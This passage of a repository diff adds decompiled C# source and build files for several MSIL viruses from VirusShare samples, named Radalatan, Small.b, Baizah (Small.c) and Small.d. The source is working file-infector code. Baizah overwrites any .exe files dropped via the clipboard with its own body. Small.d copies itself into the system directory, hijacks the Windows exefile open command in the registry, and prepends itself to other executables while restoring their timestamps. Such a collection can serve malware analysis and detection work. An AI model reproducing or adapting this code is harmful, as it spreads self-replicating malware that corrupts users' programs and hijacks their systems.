FileSystem.Kill(str);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
MSIL/Virus/MSIL/R/Virus.MSIL.Radalatan.a-d571d0a027abe052fac96d24ed62862eaec85ae17dc1a2a1294afbd91def7f3a/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Virus/MSIL/R/Virus.MSIL.Radalatan.a-d571d0a027abe052fac96d24ed62862eaec85ae17dc1a2a1294afbd91def7f3a/Virus.MSIL.Radalatan.a.csproj
+42
View File
@@ -0,0 +1,42 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Radalatan.a-d571d0a027abe052fac96d24ed62862eaec85ae17dc1a2a1294afbd91def7f3a.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{EA58E817-9281-4669-BFE5-27DE89B928B7}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>V1</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>V1</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="AT.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Virus/MSIL/R/Virus.MSIL.Radalatan.a-d571d0a027abe052fac96d24ed62862eaec85ae17dc1a2a1294afbd91def7f3a/Virus.MSIL.Radalatan.a.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "V1", "Virus.MSIL.Radalatan.a-d571d0a027abe052fac96d24ed62862eaec85ae17dc1a2a1294afbd91def7f3a.csproj", "{EA58E817-9281-4669-BFE5-27DE89B928B7}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{EA58E817-9281-4669-BFE5-27DE89B928B7}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EA58E817-9281-4669-BFE5-27DE89B928B7}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EA58E817-9281-4669-BFE5-27DE89B928B7}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EA58E817-9281-4669-BFE5-27DE89B928B7}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Virus/MSIL/S/Virus.MSIL.Small.b-1adb1928d12bc8309b4d2734a7d4700231035d1666f983e995079b4f167842c7/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Virus/MSIL/S/Virus.MSIL.Small.b-1adb1928d12bc8309b4d2734a7d4700231035d1666f983e995079b4f167842c7/Hello.cs
+13
View File
@@ -0,0 +1,13 @@
// Decompiled with JetBrains decompiler
// Type: Hello
// Assembly: hello, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 78185313-FB1E-476C-A9FD-BA8A56D694D3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.b-1adb1928d12bc8309b4d2734a7d4700231035d1666f983e995079b4f167842c7.exe
internal class Hello
{
private static void Main()
{
// ISSUE: unable to decompile the method.
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.b-1adb1928d12bc8309b4d2734a7d4700231035d1666f983e995079b4f167842c7/Virus.MSIL.Small.b.csproj
+39
View File
@@ -0,0 +1,39 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.b-1adb1928d12bc8309b4d2734a7d4700231035d1666f983e995079b4f167842c7.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{72D58C81-974F-4786-92A7-698B07EF16B9}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>hello</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="Hello.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Virus/MSIL/S/Virus.MSIL.Small.b-1adb1928d12bc8309b4d2734a7d4700231035d1666f983e995079b4f167842c7/Virus.MSIL.Small.b.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "hello", "Virus.MSIL.Small.b-1adb1928d12bc8309b4d2734a7d4700231035d1666f983e995079b4f167842c7.csproj", "{72D58C81-974F-4786-92A7-698B07EF16B9}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{72D58C81-974F-4786-92A7-698B07EF16B9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{72D58C81-974F-4786-92A7-698B07EF16B9}.Debug|Any CPU.Build.0 = Debug|Any CPU
{72D58C81-974F-4786-92A7-698B07EF16B9}.Release|Any CPU.ActiveCfg = Release|Any CPU
{72D58C81-974F-4786-92A7-698B07EF16B9}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Virus/MSIL/S/Virus.MSIL.Small.c-f40845ea259fc051ffa3c16cc1cb4e147ac5c46bfa927107f307992fb18573e4/AssemblyInfo.cs
+10
View File
@@ -0,0 +1,10 @@
using System.Reflection;
[assembly: AssemblyKeyFile("..\\..\\MSIL_Baizah.snk")]
[assembly: AssemblyDelaySign(true)]
[assembly: AssemblyCopyright("(c) MyVWA")]
[assembly: AssemblyProduct("Baizah")]
[assembly: AssemblyCompany("MyVWA")]
[assembly: AssemblyDescription("MyVWA.Fa Made in Malaysia 2005")]
[assembly: AssemblyTitle("MSIL_Baizah")]
[assembly: AssemblyVersion("0.1.1.4904")]
MSIL/Virus/MSIL/S/Virus.MSIL.Small.c-f40845ea259fc051ffa3c16cc1cb4e147ac5c46bfa927107f307992fb18573e4/Baizah.cs
+72
View File
@@ -0,0 +1,72 @@
// Decompiled with JetBrains decompiler
// Type: MSIL_Baizah.Baizah
// Assembly: MSIL_Baizah, Version=0.1.1.4904, Culture=neutral, PublicKeyToken=1497983a8894e652
// MVID: 1CA6961D-C379-4794-90D6-FCB5D0BD9BC6
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.c-f40845ea259fc051ffa3c16cc1cb4e147ac5c46bfa927107f307992fb18573e4.exe
using System;
using System.IO;
using System.Reflection;
using System.Security.Permissions;
using System.Windows.Forms;
namespace MSIL_Baizah
{
public class Baizah : MainVirus
{
private Timer myTimer = new Timer();
private void TimerEventProcessor(object myObject, EventArgs myEventArgs)
{
IDataObject dataObject = Clipboard.GetDataObject();
if (!dataObject.GetDataPresent(DataFormats.FileDrop))
return;
foreach (string str in (string[]) dataObject.GetData(DataFormats.FileDrop))
{
try
{
if (new FileInfo(str).Extension == MainVirus.Decode("LmV4ZQ=="))
this.CopyHost(str);
}
catch
{
}
}
}
private void CopyHost(string target)
{
FileInfo fileInfo1 = new FileInfo(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName);
FileInfo fileInfo2 = new FileInfo(target);
if (!fileInfo2.Exists)
return;
try
{
Stream stream1 = (Stream) fileInfo1.OpenRead();
Stream stream2 = (Stream) fileInfo2.OpenWrite();
BufferedStream bufferedStream1 = new BufferedStream(stream1);
BufferedStream bufferedStream2 = new BufferedStream(stream2);
byte[] buffer = new byte[1024];
int count;
while ((count = bufferedStream1.Read(buffer, 0, 1024)) > 0)
bufferedStream2.Write(buffer, 0, count);
bufferedStream2.Flush();
bufferedStream1.Close();
bufferedStream2.Close();
}
catch (Exception ex)
{
}
}
[PermissionSet(SecurityAction.Deny, XML = "<PermissionSet class=\"System.Security.PermissionSet\"\r\n version=\"1\">\r\n <IPermission class=\"System.Security.Permissions.ReflectionPermission, mscorlib, Version=1.0.5000.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\r\n version=\"1\"\r\n Flags=\"NoFlags\"/>\r\n</PermissionSet>\r\n")]
public void Baiz()
{
this.myTimer.Tick += new EventHandler(this.TimerEventProcessor);
this.myTimer.Interval = new Random().Next(1000, 10000);
this.myTimer.Start();
while (true)
Application.DoEvents();
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.c-f40845ea259fc051ffa3c16cc1cb4e147ac5c46bfa927107f307992fb18573e4/MainVirus.cs
+31
View File
@@ -0,0 +1,31 @@
// Decompiled with JetBrains decompiler
// Type: MSIL_Baizah.MainVirus
// Assembly: MSIL_Baizah, Version=0.1.1.4904, Culture=neutral, PublicKeyToken=1497983a8894e652
// MVID: 1CA6961D-C379-4794-90D6-FCB5D0BD9BC6
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.c-f40845ea259fc051ffa3c16cc1cb4e147ac5c46bfa927107f307992fb18573e4.exe
using System;
using System.Text;
using System.Threading;
namespace MSIL_Baizah
{
public class MainVirus
{
private static string Info = "MSIL.Baizah (c) by MyVWA.Fa Made in Malaysia 032005";
private static void Main() => new Thread(new ThreadStart(new Baizah().Baiz)).Start();
protected internal static string Decode(string input)
{
try
{
return Encoding.ASCII.GetString(Convert.FromBase64String(input));
}
catch (Exception ex)
{
return (string) null;
}
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.c-f40845ea259fc051ffa3c16cc1cb4e147ac5c46bfa927107f307992fb18573e4/Virus.MSIL.Small.c.csproj
+41
View File
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.c-f40845ea259fc051ffa3c16cc1cb4e147ac5c46bfa927107f307992fb18573e4.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{640056C8-1D28-4052-983A-963F485EB4EA}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>MSIL_Baizah</AssemblyName>
<ApplicationVersion>0.1.1.4904</ApplicationVersion>
<RootNamespace>MSIL_Baizah</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="MainVirus.cs" />
<Compile Include="Baizah.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Virus/MSIL/S/Virus.MSIL.Small.c-f40845ea259fc051ffa3c16cc1cb4e147ac5c46bfa927107f307992fb18573e4/Virus.MSIL.Small.c.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MSIL_Baizah", "Virus.MSIL.Small.c-f40845ea259fc051ffa3c16cc1cb4e147ac5c46bfa927107f307992fb18573e4.csproj", "{640056C8-1D28-4052-983A-963F485EB4EA}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{640056C8-1D28-4052-983A-963F485EB4EA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{640056C8-1D28-4052-983A-963F485EB4EA}.Debug|Any CPU.Build.0 = Debug|Any CPU
{640056C8-1D28-4052-983A-963F485EB4EA}.Release|Any CPU.ActiveCfg = Release|Any CPU
{640056C8-1D28-4052-983A-963F485EB4EA}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Virus/MSIL/S/Virus.MSIL.Small.d-5b328849ffa3b0176bc09c399920923169a7a8ceec3f27ea9c9460fdc3c743f6/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Virus/MSIL/S/Virus.MSIL.Small.d-5b328849ffa3b0176bc09c399920923169a7a8ceec3f27ea9c9460fdc3c743f6/Module1.cs
+172
View File
@@ -0,0 +1,172 @@
// Decompiled with JetBrains decompiler
// Type: A1.Module1
// Assembly: A1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C1AB6CC2-D9C5-4370-9131-5F354F00AF83
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.d-5b328849ffa3b0176bc09c399920923169a7a8ceec3f27ea9c9460fdc3c743f6.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Windows.Forms;
namespace A1
{
[StandardModule]
internal sealed class Module1
{
[STAThread]
public static void Main()
{
string executablePath = Application.ExecutablePath;
string str1 = Path.Combine(Environment.SystemDirectory, "WebCompressor.EXE");
byte[] array1 = new byte[5121];
ProcessStartInfo startInfo = new ProcessStartInfo();
startInfo.UseShellExecute = false;
try
{
FileStream fileStream = new FileStream(executablePath, FileMode.Open, FileAccess.Read);
fileStream.Read(array1, 0, 5120);
fileStream.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (StringType.StrCmp(executablePath, str1, false) == 0)
{
try
{
string commandLineArg = Environment.GetCommandLineArgs()[1];
if (File.Exists(commandLineArg))
{
byte[] array2 = new byte[5121];
try
{
FileInfo fileInfo = new FileInfo(commandLineArg);
if (fileInfo.Length >= 5120L)
{
int attributes = (int) fileInfo.Attributes;
DateTime creationTime = fileInfo.CreationTime;
DateTime lastWriteTime = fileInfo.LastWriteTime;
DateTime lastAccessTime = fileInfo.LastAccessTime;
fileInfo.Attributes = FileAttributes.Normal;
FileStream fileStream = new FileStream(commandLineArg, FileMode.Open, FileAccess.ReadWrite);
fileStream.Read(array2, 0, 5120);
if (StringType.StrCmp(BitConverter.ToString(array1), BitConverter.ToString(array2), false) != 0)
{
fileStream.Position = 0L;
fileStream.Write(array1, 0, 5120);
fileStream.Position = fileStream.Length;
fileStream.Write(array2, 0, 5120);
}
fileStream.Close();
fileInfo.Attributes = (FileAttributes) attributes;
fileInfo.CreationTime = creationTime;
fileInfo.LastWriteTime = lastWriteTime;
fileInfo.LastAccessTime = lastAccessTime;
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
ProcessStartInfo processStartInfo = startInfo;
processStartInfo.ErrorDialog = true;
processStartInfo.FileName = commandLineArg;
processStartInfo.Arguments = Interaction.Command().Remove(0, checked (Strings.Len(commandLineArg) + 2));
try
{
Process.Start(startInfo);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
else
{
try
{
try
{
FileSystem.SetAttr(str1, FileAttribute.Normal);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
FileStream fileStream = new FileStream(str1, FileMode.OpenOrCreate, FileAccess.Write);
fileStream.Write(array1, 0, 5120);
fileStream.Close();
FileSystem.SetAttr(str1, FileAttribute.ReadOnly);
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("ExeFile\\Shell\\Open\\Command", true);
registryKey.SetValue("", (object) (str1 + " \"%1\" %*"));
registryKey.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
if (new FileInfo(executablePath).Length < 10240L)
return;
FileStream fileStream1 = new FileStream(executablePath, FileMode.Open, FileAccess.Read);
fileStream1.Position = checked (fileStream1.Length - 5120L);
fileStream1.Read(array1, 0, 5120);
fileStream1.Close();
string tempFileName = Path.GetTempFileName();
try
{
FileSystem.Kill(tempFileName);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
string str2 = Path.Combine(Application.StartupPath, Path.GetFileNameWithoutExtension(tempFileName) + ".EXE");
try
{
FileSystem.SetAttr(str2, FileAttribute.Normal);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
File.Copy(executablePath, str2, true);
FileStream fileStream2 = new FileStream(str2, FileMode.Open, FileAccess.Write);
fileStream2.Write(array1, 0, 5120);
fileStream2.SetLength(checked (fileStream2.Length - 5120L));
fileStream2.Close();
startInfo.FileName = str2;
startInfo.Arguments = Interaction.Command();
Process.Start(startInfo).WaitForExit();
FileSystem.SetAttr(str2, FileAttribute.Normal);
FileSystem.Kill(str2);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.d-5b328849ffa3b0176bc09c399920923169a7a8ceec3f27ea9c9460fdc3c743f6/Virus.MSIL.Small.d.csproj
+45
View File
@@ -0,0 +1,45 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.d-5b328849ffa3b0176bc09c399920923169a7a8ceec3f27ea9c9460fdc3c743f6.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{9C7DDFA3-CE49-46A4-BDCB-96A0123C507E}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>A1</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>A1</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Virus/MSIL/S/Virus.MSIL.Small.d-5b328849ffa3b0176bc09c399920923169a7a8ceec3f27ea9c9460fdc3c743f6/Virus.MSIL.Small.d.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "A1", "Virus.MSIL.Small.d-5b328849ffa3b0176bc09c399920923169a7a8ceec3f27ea9c9460fdc3c743f6.csproj", "{9C7DDFA3-CE49-46A4-BDCB-96A0123C507E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{9C7DDFA3-CE49-46A4-BDCB-96A0123C507E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9C7DDFA3-CE49-46A4-BDCB-96A0123C507E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{9C7DDFA3-CE49-46A4-BDCB-96A0123C507E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{9C7DDFA3-CE49-46A4-BDCB-96A0123C507E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Virus/MSIL/S/Virus.MSIL.Small.d-90ca70d213e58ad53749d712f830807701db7e36d6e00d8bbaf79f0071b7b002/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Virus/MSIL/S/Virus.MSIL.Small.d-90ca70d213e58ad53749d712f830807701db7e36d6e00d8bbaf79f0071b7b002/Module1.cs
+172
View File
@@ -0,0 +1,172 @@
// Decompiled with JetBrains decompiler
// Type: A1.Module1
// Assembly: A1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C1AB6CC2-D9C5-4370-9131-5F354F00AF83
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.d-90ca70d213e58ad53749d712f830807701db7e36d6e00d8bbaf79f0071b7b002.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Windows.Forms;
namespace A1
{
[StandardModule]
internal sealed class Module1
{
[STAThread]
public static void Main()
{
string executablePath = Application.ExecutablePath;
string str1 = Path.Combine(Environment.SystemDirectory, "WebCompressor.EXE");
byte[] array1 = new byte[5121];
ProcessStartInfo startInfo = new ProcessStartInfo();
startInfo.UseShellExecute = false;
try
{
FileStream fileStream = new FileStream(executablePath, FileMode.Open, FileAccess.Read);
fileStream.Read(array1, 0, 5120);
fileStream.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (StringType.StrCmp(executablePath, str1, false) == 0)
{
try
{
string commandLineArg = Environment.GetCommandLineArgs()[1];
if (File.Exists(commandLineArg))
{
byte[] array2 = new byte[5121];
try
{
FileInfo fileInfo = new FileInfo(commandLineArg);
if (fileInfo.Length >= 5120L)
{
int attributes = (int) fileInfo.Attributes;
DateTime creationTime = fileInfo.CreationTime;
DateTime lastWriteTime = fileInfo.LastWriteTime;
DateTime lastAccessTime = fileInfo.LastAccessTime;
fileInfo.Attributes = FileAttributes.Normal;
FileStream fileStream = new FileStream(commandLineArg, FileMode.Open, FileAccess.ReadWrite);
fileStream.Read(array2, 0, 5120);
if (StringType.StrCmp(BitConverter.ToString(array1), BitConverter.ToString(array2), false) != 0)
{
fileStream.Position = 0L;
fileStream.Write(array1, 0, 5120);
fileStream.Position = fileStream.Length;
fileStream.Write(array2, 0, 5120);
}
fileStream.Close();
fileInfo.Attributes = (FileAttributes) attributes;
fileInfo.CreationTime = creationTime;
fileInfo.LastWriteTime = lastWriteTime;
fileInfo.LastAccessTime = lastAccessTime;
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
ProcessStartInfo processStartInfo = startInfo;
processStartInfo.ErrorDialog = true;
processStartInfo.FileName = commandLineArg;
processStartInfo.Arguments = Interaction.Command().Remove(0, checked (Strings.Len(commandLineArg) + 2));
try
{
Process.Start(startInfo);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
else
{
try
{
try
{
FileSystem.SetAttr(str1, FileAttribute.Normal);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
FileStream fileStream = new FileStream(str1, FileMode.OpenOrCreate, FileAccess.Write);
fileStream.Write(array1, 0, 5120);
fileStream.Close();
FileSystem.SetAttr(str1, FileAttribute.ReadOnly);
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("ExeFile\\Shell\\Open\\Command", true);
registryKey.SetValue("", (object) (str1 + " \"%1\" %*"));
registryKey.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
if (new FileInfo(executablePath).Length < 10240L)
return;
FileStream fileStream1 = new FileStream(executablePath, FileMode.Open, FileAccess.Read);
fileStream1.Position = checked (fileStream1.Length - 5120L);
fileStream1.Read(array1, 0, 5120);
fileStream1.Close();
string tempFileName = Path.GetTempFileName();
try
{
FileSystem.Kill(tempFileName);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
string str2 = Path.Combine(Application.StartupPath, Path.GetFileNameWithoutExtension(tempFileName) + ".EXE");
try
{
FileSystem.SetAttr(str2, FileAttribute.Normal);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
File.Copy(executablePath, str2, true);
FileStream fileStream2 = new FileStream(str2, FileMode.Open, FileAccess.Write);
fileStream2.Write(array1, 0, 5120);
fileStream2.SetLength(checked (fileStream2.Length - 5120L));
fileStream2.Close();
startInfo.FileName = str2;
startInfo.Arguments = Interaction.Command();
Process.Start(startInfo).WaitForExit();
FileSystem.SetAttr(str2, FileAttribute.Normal);
FileSystem.Kill(str2);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.d-90ca70d213e58ad53749d712f830807701db7e36d6e00d8bbaf79f0071b7b002/Virus.MSIL.Small.d.csproj
+45
View File
@@ -0,0 +1,45 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
